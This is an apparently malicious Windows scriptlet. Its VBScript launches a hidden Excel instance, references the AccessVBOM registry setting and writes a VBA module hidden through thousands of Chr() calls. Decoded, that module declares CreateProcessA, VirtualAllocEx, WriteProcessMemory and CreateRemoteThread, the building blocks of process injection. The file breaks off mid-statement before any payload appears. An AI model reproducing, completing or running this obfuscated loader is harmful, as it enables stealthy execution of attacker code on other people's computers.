<?XML version="1.0"?>
<scriptlet>
<registration
progid="newTest"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="VBScript">
<![CDATA[
Function Register
MsgBox ""
End Function
]]>
</script>
</registration>

<public>
<method name="Test"></method>
</public>

<script language="VBScript">
<![CDATA[

Function Test()
Dim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule

Set objExcel = CreateObject("Excel.Application")
objExcel.Visible = False

Application_Version = objExcel.Version
Set WshShell = CreateObject("Wscript.Shell")

strRegPath = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application_Version & "\Excel\Security\AccessVBOM"

Set objWorkbook = objExcel.Workbooks.Add()
Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1)
strCode = Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(84)&Chr(121)&Chr(112)&Chr(101)&Chr(32)&Chr(80)&Chr(82)&Chr(79)&Chr(67)&Chr(69)&Chr(83)&Chr(83)&Chr(95)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(82)&Chr(77)&Chr(65)&Chr(84)&Chr(73)&Chr(79)&Chr(78)& _ 
Chr(10)&Chr(104)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(104)&Chr(84)&Chr(104)&Chr(114)&Chr(101)&Chr(97)&Chr(100)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)& _ 
Chr(103)&Chr(10)&Chr(100)&Chr(119)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(73)&Chr(100)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(100)&Chr(119)&Chr(84)&Chr(104)&Chr(114)&Chr(101)&Chr(97)&Chr(100)&Chr(73)&Chr(100)& _ 
Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(69)&Chr(110)&Chr(100)&Chr(32)&Chr(84)&Chr(121)&Chr(112)&Chr(101)&Chr(10)&Chr(10)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(84)&Chr(121)&Chr(112)&Chr(101)&Chr(32)& _ 
Chr(83)&Chr(84)&Chr(65)&Chr(82)&Chr(84)&Chr(85)&Chr(80)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(10)&Chr(99)&Chr(98)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(108)&Chr(112)&Chr(82)&Chr(101)&Chr(115)&Chr(101)&Chr(114)&Chr(118)&Chr(101)& _ 
Chr(100)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(10)&Chr(108)&Chr(112)&Chr(68)&Chr(101)&Chr(115)&Chr(107)&Chr(116)&Chr(111)&Chr(112)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(10)& _ 
Chr(108)&Chr(112)&Chr(84)&Chr(105)&Chr(116)&Chr(108)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(10)&Chr(100)&Chr(119)&Chr(88)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(100)&Chr(119)& _ 
Chr(89)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(100)&Chr(119)&Chr(88)&Chr(83)&Chr(105)&Chr(122)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(100)&Chr(119)&Chr(89)&Chr(83)&Chr(105)&Chr(122)& _ 
Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(100)&Chr(119)&Chr(88)&Chr(67)&Chr(111)&Chr(117)&Chr(110)&Chr(116)&Chr(67)&Chr(104)&Chr(97)&Chr(114)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)& _ 
Chr(100)&Chr(119)&Chr(89)&Chr(67)&Chr(111)&Chr(117)&Chr(110)&Chr(116)&Chr(67)&Chr(104)&Chr(97)&Chr(114)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(100)&Chr(119)&Chr(70)&Chr(105)&Chr(108)&Chr(108)&Chr(65)&Chr(116)&Chr(116)&Chr(114)& _ 
Chr(105)&Chr(98)&Chr(117)&Chr(116)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(100)&Chr(119)&Chr(70)&Chr(108)&Chr(97)&Chr(103)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(119)&Chr(83)& _ 
Chr(104)&Chr(111)&Chr(119)&Chr(87)&Chr(105)&Chr(110)&Chr(100)&Chr(111)&Chr(119)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(73)&Chr(110)&Chr(116)&Chr(101)&Chr(103)&Chr(101)&Chr(114)&Chr(10)&Chr(99)&Chr(98)&Chr(82)&Chr(101)&Chr(115)&Chr(101)&Chr(114)&Chr(118)&Chr(101)&Chr(100)&Chr(50)& _ 
Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(73)&Chr(110)&Chr(116)&Chr(101)&Chr(103)&Chr(101)&Chr(114)&Chr(10)&Chr(108)&Chr(112)&Chr(82)&Chr(101)&Chr(115)&Chr(101)&Chr(114)&Chr(118)&Chr(101)&Chr(100)&Chr(50)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)& _ 
Chr(104)&Chr(83)&Chr(116)&Chr(100)&Chr(73)&Chr(110)&Chr(112)&Chr(117)&Chr(116)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(104)&Chr(83)&Chr(116)&Chr(100)&Chr(79)&Chr(117)&Chr(116)&Chr(112)&Chr(117)&Chr(116)&Chr(32)&Chr(65)&Chr(115)&Chr(32)& _ 
Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(104)&Chr(83)&Chr(116)&Chr(100)&Chr(69)&Chr(114)&Chr(114)&Chr(111)&Chr(114)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(69)&Chr(110)&Chr(100)&Chr(32)&Chr(84)&Chr(121)&Chr(112)&Chr(101)&Chr(10)& _ 
Chr(10)&Chr(35)&Chr(73)&Chr(102)&Chr(32)&Chr(86)&Chr(98)&Chr(97)&Chr(55)&Chr(32)&Chr(84)&Chr(104)&Chr(101)&Chr(110)&Chr(10)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(80)& _ 
Chr(116)&Chr(114)&Chr(83)&Chr(97)&Chr(102)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)&Chr(101)&Chr(82)&Chr(101)&Chr(109)&Chr(111)&Chr(116)&Chr(101)&Chr(84)&Chr(104)&Chr(114)&Chr(101)& _ 
Chr(97)&Chr(100)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)&Chr(114)&Chr(110)&Chr(101)&Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(76)&Chr(117)&Chr(106)&Chr(107)&Chr(100)&Chr(97)&Chr(32)& _ 
Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(68)&Chr(116)&Chr(122)&Chr(120)&Chr(99)&Chr(110)&Chr(103)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)& _ 
Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(89)&Chr(105)&Chr(111)&Chr(121)&Chr(106)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(89)&Chr(102)&Chr(106)&Chr(121)&Chr(99)& _ 
Chr(119)&Chr(106)&Chr(103)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(44)&Chr(32)&Chr(75)&Chr(105)&Chr(110)&Chr(120)&Chr(109)&Chr(118)&Chr(117)&Chr(112)&Chr(98)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)& _ 
Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(71)&Chr(103)&Chr(105)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(75)&Chr(108)&Chr(107)&Chr(110)&Chr(113)&Chr(121)&Chr(32)&Chr(65)&Chr(115)&Chr(32)& _ 
Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(41)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(10)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)& _ 
Chr(32)&Chr(80)&Chr(116)&Chr(114)&Chr(83)&Chr(97)&Chr(102)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(86)&Chr(105)&Chr(114)&Chr(116)&Chr(117)&Chr(97)&Chr(108)&Chr(65)&Chr(108)&Chr(108)&Chr(111)&Chr(99)&Chr(69)&Chr(120)& _ 
Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)&Chr(114)&Chr(110)&Chr(101)&Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(71)&Chr(104)&Chr(110)&Chr(112)&Chr(108)&Chr(105)&Chr(32)&Chr(65)&Chr(115)& _ 
Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(69)&Chr(117)&Chr(113)&Chr(113)&Chr(104)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)& _ 
Chr(108)&Chr(32)&Chr(71)&Chr(103)&Chr(119)&Chr(102)&Chr(122)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(67)&Chr(116)&Chr(101)&Chr(119)&Chr(114)&Chr(32)&Chr(65)&Chr(115)&Chr(32)& _ 
Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(78)&Chr(119)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(41)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)& _ 
Chr(80)&Chr(116)&Chr(114)&Chr(10)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(80)&Chr(116)&Chr(114)&Chr(83)&Chr(97)&Chr(102)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)& _ 
Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(87)&Chr(114)&Chr(105)&Chr(116)&Chr(101)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(77)&Chr(101)&Chr(109)&Chr(111)&Chr(114)&Chr(121)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)&Chr(114)& _ 
Chr(110)&Chr(101)&Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(82)&Chr(120)&Chr(122)&Chr(103)&Chr(105)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)& _ 
Chr(97)&Chr(108)&Chr(32)&Chr(89)&Chr(117)&Chr(117)&Chr(103)&Chr(120)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(82)&Chr(101)&Chr(102)&Chr(32)&Chr(85)&Chr(115)&Chr(115)&Chr(120)&Chr(103)& _ 
Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(76)&Chr(106)&Chr(105)&Chr(104)&Chr(97)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)& _ 
Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(75)&Chr(112)&Chr(108)&Chr(111)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(41)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)& _ 
Chr(10)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(80)&Chr(116)&Chr(114)&Chr(83)&Chr(97)&Chr(102)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)&Chr(116)&Chr(105)&Chr(111)& _ 
Chr(110)&Chr(32)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)&Chr(101)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(65)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)&Chr(114)&Chr(110)&Chr(101)&Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)& _ 
Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(73)&Chr(108)&Chr(111)&Chr(112)&Chr(97)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(65)&Chr(112)& _ 
Chr(118)&Chr(98)&Chr(98)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(79)&Chr(117)&Chr(108)&Chr(103)&Chr(120)&Chr(122)&Chr(97)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)& _ 
Chr(73)&Chr(117)&Chr(108)&Chr(100)&Chr(102)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(87)&Chr(117)&Chr(108)&Chr(97)&Chr(120)&Chr(110)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)& _ 
Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(66)&Chr(99)&Chr(100)&Chr(108)&Chr(112)&Chr(105)&Chr(97)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(89)&Chr(117)&Chr(108)&Chr(105)&Chr(109)& _ 
Chr(122)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(81)&Chr(106)&Chr(105)&Chr(108)&Chr(118)&Chr(102)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)& _ 
Chr(44)&Chr(32)&Chr(74)&Chr(109)&Chr(101)&Chr(120)&Chr(117)&Chr(105)&Chr(122)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(84)&Chr(65)&Chr(82)&Chr(84)&Chr(85)&Chr(80)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(44)&Chr(32)&Chr(76)&Chr(105)&Chr(120)&Chr(115)&Chr(117)&Chr(105)& _ 
Chr(110)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(80)&Chr(82)&Chr(79)&Chr(67)&Chr(69)&Chr(83)&Chr(83)&Chr(95)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(82)&Chr(77)&Chr(65)&Chr(84)&Chr(73)&Chr(79)&Chr(78)&Chr(41)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)& _ 
Chr(103)&Chr(10)&Chr(35)&Chr(69)&Chr(108)&Chr(115)&Chr(101)&Chr(10)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)&Chr(116)&Chr(105)&Chr(111)&Chr(110)& _ 
Chr(32)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)&Chr(101)&Chr(82)&Chr(101)&Chr(109)&Chr(111)&Chr(116)&Chr(101)&Chr(84)&Chr(104)&Chr(114)&Chr(101)&Chr(97)&Chr(100)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)&Chr(114)&Chr(110)&Chr(101)&Chr(108)&Chr(51)& _ 
Chr(50)&Chr(34)&Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(76)&Chr(117)&Chr(106)&Chr(107)&Chr(100)&Chr(97)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)& _ 
Chr(68)&Chr(116)&Chr(122)&Chr(120)&Chr(99)&Chr(110)&Chr(103)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(89)&Chr(105)&Chr(111)&Chr(121)&Chr(106)&Chr(32)&Chr(65)&Chr(115)&Chr(32)& _ 
Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(89)&Chr(102)&Chr(106)&Chr(121)&Chr(99)&Chr(119)&Chr(106)&Chr(103)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(44)& _ 
Chr(32)&Chr(75)&Chr(105)&Chr(110)&Chr(120)&Chr(109)&Chr(118)&Chr(117)&Chr(112)&Chr(98)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(71)&Chr(103)&Chr(105)&Chr(32)&Chr(65)&Chr(115)& _ 
Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(75)&Chr(108)&Chr(107)&Chr(110)&Chr(113)&Chr(121)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(41)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)& _ 
Chr(114)&Chr(10)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(86)&Chr(105)&Chr(114)&Chr(116)&Chr(117)& _ 
Chr(97)&Chr(108)&Chr(65)&Chr(108)&Chr(108)&Chr(111)&Chr(99)&Chr(69)&Chr(120)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)&Chr(114)&Chr(110)&Chr(101)&Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)& _ 
Chr(71)&Chr(104)&Chr(110)&Chr(112)&Chr(108)&Chr(105)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(69)&Chr(117)&Chr(113)&Chr(113)&Chr(104)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)& _ 
Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(71)&Chr(103)&Chr(119)&Chr(102)&Chr(122)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)& _ 
Chr(67)&Chr(116)&Chr(101)&Chr(119)&Chr(114)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(78)&Chr(119)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)& _ 
Chr(41)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(10)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)& _ 
Chr(99)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(87)&Chr(114)&Chr(105)&Chr(116)&Chr(101)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(77)&Chr(101)&Chr(109)&Chr(111)&Chr(114)&Chr(121)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)& _ 
Chr(114)&Chr(110)&Chr(101)&Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(82)&Chr(120)&Chr(122)&Chr(103)&Chr(105)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)& _ 
Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(89)&Chr(117)&Chr(117)&Chr(103)&Chr(120)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(82)&Chr(101)&Chr(102)&Chr(32)&Chr(85)&Chr(115)&Chr(115)&Chr(120)& _ 
Chr(103)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(76)&Chr(106)&Chr(105)&Chr(104)&Chr(97)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)& _ 
Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(75)&Chr(112)&Chr(108)&Chr(111)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(41)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)& _ 
Chr(114)&Chr(10)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)& _ 
Chr(101)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(65)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)&Chr(114)&Chr(110)&Chr(101)&Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)& _ 
Chr(73)&Chr(108)&Chr(111)&Chr(112)&Chr(97)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(65)&Chr(112)&Chr(118)&Chr(98)&Chr(98)&Chr(115)&Chr(32)&Chr(65)&Chr(115)& _ 
